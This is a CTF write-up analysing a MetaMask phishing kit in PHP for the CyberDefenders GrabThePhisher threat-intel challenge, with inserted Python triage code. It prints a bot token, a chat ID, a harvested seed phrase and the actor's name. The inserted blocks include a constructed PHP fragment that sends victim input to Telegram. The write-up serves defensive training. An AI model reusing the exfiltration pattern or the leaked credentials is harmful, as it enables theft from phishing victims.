GrabThePhisher CTF Writeup

Ali Alaa
Jun 10, 2023

Hello dudes,
I hope this finds you well.

This is Ali Alaa, and this is a writeup of the GrabThePhisher challenge from the CyberDefenders platform.

This is a Threat Intel challenge; if you want to learn more about this topic, you can try the GrabThePhisher challenge yourself.

So, let's start...

First Question: Which wallet is used for asking the seed phrase?

I browsed index.html, which is the main home page for all the wallets, but the "pankewk" directory contains only one wallet directory, "metamask", with all the others excluded. When I opened that directory I found a file called "metamask.php", which is the file used to carry out the phishing. So, he used MetaMask as the wallet.

[Figure: All files related to the phishing]

Here we go, the answer is: Metamask

Second Question: What is the file name that has the code for the phishing kit?

I navigated to the "metamask" directory earlier; as you can see in the figure from the first question, the file used to carry out the phishing is "metamask.php".

Here we go, the answer is: metamask.php

Third Question: In which language was the kit written?

Here I figured out the language from the file extension, but what if the phisher tried to mislead the investigator by changing the extension or manipulating the magic header? (Probably not in a case like this, but keep it in mind.) So I opened the file, and it opened normally as PHP source.
He didn't mislead me 😃.

Here we go, the answer is: PHP

Fourth Question: What service does the kit use to retrieve the victim's machine information?

Here I opened the "metamask.php" file in a text editor to see the code inside and what the phisher used.

[Figure: Code to retrieve the victim's machine information]

So, he used a service called Sypex Geo.

Here we go, the answer is: Sypex Geo

Fifth Question: How many seed phrases were already collected?

I analysed the PHP code to understand how it works: after the kit sends the data to his Telegram chat, it gets the content and writes it to the "log" directory.

[Figure: metamask code]
[Figure: log directory]

And it stores the seed phrases here:

[Figure: seed phrases]

Counting all the seed phrases gives 3 seed phrases.

Here we go, the answer is: 3

Sixth Question: Write down the seed phrase of the most recent phishing incident?

The most recent seed phrase is the last one submitted through the form.

[Figure: Most recent seed phrase]

Here we go, the answer is: father also recycle embody balance concert mechanic believe owner pair muffin hockey
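The two questions above are answered by reading the kit's log directory by hand. The following is an added example, not code from the writeup or from the challenge, that does the same triage over a constructed log (the line format, timestamps, IPs and phrases are all invented stand-ins, not the challenge's real entries): it keeps only lines that look like BIP-39 seed phrases, counts them, picks the most recent one, and redacts a phrase so it can be quoted in an incident report without remaining usable.

```python
import re
from datetime import datetime
from typing import Optional

# Constructed sample log in the one-submission-per-line style the writeup
# describes. These are NOT the challenge's real log lines or real victims.
SAMPLE_LOG = """\
2023-06-01 10:15:02 | 203.0.113.10 | apple banana cherry dog elephant fig grape honey igloo jelly kite lemon
2023-06-03 18:40:55 | 198.51.100.7 | not a seed phrase just junk
2023-06-05 09:02:11 | 192.0.2.44 | mango nest olive pear queen rose sun tree umbrella violet water xray
2023-06-07 21:30:00 | 203.0.113.99 | zebra acid bold calm dawn echo fern gold hill iron jade kind
"""

# Assumed line layout: "<timestamp> | <victim ip> | <submitted text>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \| (?P<ip>[\d.]+) \| (?P<phrase>.+)$"
)

def is_seed_phrase(text: str) -> bool:
    """BIP-39 mnemonics are 12, 15, 18, 21 or 24 lowercase words.
    A word-count check is a cheap filter for junk/test submissions;
    validating against the BIP-39 wordlist would be stricter."""
    words = text.strip().split()
    return len(words) in (12, 15, 18, 21, 24) and all(
        w.isalpha() and w.islower() for w in words
    )

def parse_log(log_text: str) -> list:
    """Return one dict per plausible seed-phrase submission."""
    entries = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not is_seed_phrase(m["phrase"]):
            continue  # malformed line or junk submission
        entries.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "ip": m["ip"],
            "phrase": m["phrase"].strip(),
        })
    return entries

def count_victims(log_text: str) -> int:
    """Number of seed phrases already collected by the kit."""
    return len(parse_log(log_text))

def most_recent(log_text: str) -> Optional[dict]:
    """The latest submission by timestamp (None if the log has none)."""
    entries = parse_log(log_text)
    return max(entries, key=lambda e: e["ts"]) if entries else None

def redact(phrase: str) -> str:
    """Keep first and last word, mask the rest, so the phrase can be cited
    in a report without being recoverable."""
    words = phrase.split()
    if len(words) < 3:
        return "****"
    return " ".join([words[0]] + ["****"] * (len(words) - 2) + [words[-1]])

if __name__ == "__main__":
    print("collected:", count_victims(SAMPLE_LOG))
    latest = most_recent(SAMPLE_LOG)
    print("most recent:", latest["ts"], latest["ip"], redact(latest["phrase"]))
```

Sorting by the log's own timestamp rather than trusting file order matters when the kit appends from several PHP workers or when a responder has concatenated daily log files.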

Seventh Question: Which medium had been used for credential dumping?

By analyzing the PHP code, here is the medium used to dump the credentials.
The phisher used his chat ID and bot token for his channel.

[Figure: Medium details]

So, the medium is Telegram.

Here we go, the answer is: Telegram

Eighth Question: What is the token for the channel?

From the "sendTel" function I can figure out the channel's token.

[Figure: Channel's token]

Here we go, the answer is: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

Ninth Question: What is the chat ID of the phisher’s channel?

From the "sendTel" function I can figure out the channel's ID.

[Figure: Channel's ID]

Here we go, the answer is: 5442785564

Tenth Question: What are the allies of the phish kit developer?

In the "metamask.php" file, the phisher leaves a nice comment for his brothers, so cute 🥺

[Figure: Comment]

Here we go, the answer is: j1j1b1s@m3r0

Eleventh Question: What is the full name of the Phish Actor?

Here I got stuck, but after some concentration I saw that he used the Telegram API to send a message, and after this the kit gets the content of the file.

This means the API responds with data in JSON format, so let's try to use the data he used before, like the chat ID and token, to send a message; the response may contain PII data.

[Figure: Message and chat data]

Here we go, the answer is: Marcus Aurelius

Twelfth Question: What is the username of the Phish Actor?

From the JSON response data we can see the username of the phish actor.

[Figure: Message and chat data]

Here we go, the answer is: pumpkinboii
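Questions four and seven to twelve all come down to pulling indicators out of the kit source (geo-service reference, bot token, chat ID, log path, developer comment) and then reading the JSON that the Bot API's sendMessage call returns. The following is an added example, not code from the writeup or from the kit, that does both steps over constructed input. The PHP fragment, the placeholder token (`1234567890:` followed by 35 `A`s), the chat ID `1111111111`, the log path and the JSON response are all invented stand-ins; the only real details assumed are the shape of Telegram bot tokens (`<bot id>:<35 chars>`), the `https://api.telegram.org/bot<token>/sendMessage` endpoint, and the fact that a private chat's `result.chat` object carries `first_name`, `last_name` and `username`.

```python
import json
import re
from urllib.parse import urlencode

# Placeholder credentials (constructed, not the challenge's real values).
PLACEHOLDER_TOKEN = "1234567890:" + "A" * 35
PLACEHOLDER_CHAT_ID = "1111111111"

# Constructed PHP fragment imitating the exfiltration pattern the writeup
# describes: a sendTel() helper that posts to Telegram and appends to log/.
SAMPLE_KIT_SOURCE = r'''<?php
// shoutout to my brothers: example_crew
require_once 'SxGeo.php';
function sendTel($text) {
    $token = "__TOKEN__";
    $chat_id = "__CHAT_ID__";
    $url = "https://api.telegram.org/bot" . $token . "/sendMessage";
    $r = file_get_contents($url . "?chat_id=" . $chat_id . "&text=" . urlencode($text));
    file_put_contents("log/" . date("Y-m-d") . ".txt", $text . PHP_EOL, FILE_APPEND);
    return $r;
}
'''.replace("__TOKEN__", PLACEHOLDER_TOKEN).replace("__CHAT_ID__", PLACEHOLDER_CHAT_ID)

# Telegram bot tokens look like "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# A chat id assigned in PHP, e.g. $chat_id = "5442785564"; (negative ids are groups)
CHAT_ID_RE = re.compile(r"chat_id\s*=\s*[\"']?(-?\d{6,})")

def triage_kit(source: str) -> dict:
    """Static indicators a responder wants from a kit before touching any live endpoint."""
    return {
        "bot_tokens": sorted(set(TOKEN_RE.findall(source))),
        "chat_ids": sorted(set(CHAT_ID_RE.findall(source))),
        "telegram_endpoints": sorted(set(re.findall(r"api\.telegram\.org/bot[^\"'\s]*", source))),
        # Sypex Geo ships as SxGeo.php / class SxGeo, so either spelling is a hit
        "geo_service": "sypexgeo" if re.search(r"SxGeo|sypexgeo", source, re.I) else None,
        "log_paths": sorted(set(re.findall(r"[\"'](log/[^\"']*)[\"']", source))),
        # only whole-line // comments, so URLs containing // are not picked up
        "comments": [c.strip() for c in re.findall(r"^\s*//(.*)", source, re.M)],
    }

def send_message_url(token: str, chat_id: str, text: str) -> str:
    """The Bot API call the kit itself makes; shown so the request shape is explicit."""
    return f"https://api.telegram.org/bot{token}/sendMessage?" + urlencode(
        {"chat_id": chat_id, "text": text}
    )

# Constructed stand-in for the JSON that sendMessage returns for a private chat.
SAMPLE_RESPONSE = json.dumps({
    "ok": True,
    "result": {
        "message_id": 42,
        "from": {"id": 1234567890, "is_bot": True, "first_name": "examplebot", "username": "example_bot"},
        "chat": {"id": 1111111111, "first_name": "Jane", "last_name": "Doe",
                 "username": "jdoe_example", "type": "private"},
        "date": 1686400000,
        "text": "ping",
    },
})

def actor_from_response(raw: str) -> dict:
    """Pull the chat owner's profile (the operator behind the bot) from the response."""
    data = json.loads(raw)
    if not data.get("ok"):
        raise ValueError(f"Bot API error: {data.get('description')}")
    chat = data["result"]["chat"]
    if chat.get("type") != "private":
        raise ValueError("chat is a group/channel; its fields do not describe one person")
    full_name = " ".join(p for p in (chat.get("first_name"), chat.get("last_name")) if p)
    return {"chat_id": chat["id"], "full_name": full_name, "username": chat.get("username")}

if __name__ == "__main__":
    print(json.dumps(triage_kit(SAMPLE_KIT_SOURCE), indent=2))
    print(actor_from_response(SAMPLE_RESPONSE))
```

The static pass is what goes into an abuse report (token and chat ID are enough for Telegram to disable the bot); the response parser is kept separate so the same code works on a saved response captured during the investigation, without re-sending anything.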

In the end,
I hope you enjoyed this writeup ❤️.

Stay in touch

LinkedIn
